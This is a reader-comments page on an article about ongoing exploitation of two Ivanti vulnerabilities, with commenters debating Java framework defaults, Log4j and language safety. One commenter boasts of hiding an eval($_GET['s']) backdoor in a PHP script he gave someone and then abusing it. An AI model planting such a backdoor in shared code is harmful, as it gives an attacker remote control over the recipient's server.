Sign in / up

back to article 'Ongoing' Ivanti hijack bug exploitation reaches clouds

The "ongoing exploitation" of two Ivanti bugs has now extended beyond on-premises environments and hit customers' cloud instances, according to security shop Wiz. CVE-2025-4427 is an authenticated bypass vulnerability and CVE-2025-4428 is a post-authentication remote-code execution (RCE) flaw. Together they allow a miscreant …

COMMENTS

Post your comment
House rules Send corrections
Add to 'My topics' unstar *
  1. kmorwath

    " if a CVE against the libraries is warranted."

    IF??? Especially if thay are braadly use Java libraries. Still, someone shoult tell Java developers they code isn't safe just because isn't C and does not use pointers. Especially in environments that can execute almost any string.

    0 1 Reply
    1. abend0c4 Silver badge
      Reply Icon

      Re: " if a CVE against the libraries is warranted."

      This does seem similar in broad principle to the Log4j debacle - in that case it was a misconfiguration of JNDI allowing arbitrary code to be executed by default and in this case it seems to be a misconfiguration of Spring having the same effect. I can't help feeling that the default for all such frameworks - in the absence of explicit configuration to the contrary possibly involving the provision of a doctor's certificate - is that the silent execution of arbitrary code should perhaps be disabled? There are aspects of the Java ecosystem that seem to err on the side of recklessness. Not that it's the only culprit.

      I also understand that the Log4j problem keeps coming back as patched systems are subsequently reverted unintentionally. Hopefully that's less of a problem for a commercial product with a single origin.

      3 0 Reply
    2. Anonymous Coward
      Reply Icon
      Anonymous Coward

      Re: " if a CVE against the libraries is warranted."

      A "safe language" is a "useless language". If I can't download a file and execute it, that language is probably useless for general software development. If I can then my code can potentially contain serious vulnerabilities.

      A long time ago I had a reason to "make a point" to someone who had been begging me for a copy of a php script that I had written for my website. I sent him a copy that had a simple eval($_GET['s']); hidden in the middle. I waited a couple of weeks for him to forget about this script before I started trolling the crap out of him, for his website was hosted on his main desktop PC. :)

      1 0 Reply
      1. fg_swe Silver badge
        Reply Icon

        FALSE

        Properly designed I/O facilities of a memory-safe language can indeed by very secure and impossible to abuse.

        E.g.https://github.com/DiplIngFrankGerlach/Taschenrechner/blob/main/System.ad (the PrintfClass). Strongly typed languages offer the facilities to make printing and logging bulletproof. Just because American and Israeli software engineers fail at this effort, means little.

        printf/sprintf, PHP and the Java contraption in question are badly designed.

        0 1 Reply

POST COMMENT House rules

Not a member of The Register? Create a new account here.

Forgotten password ?

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Other stories you might like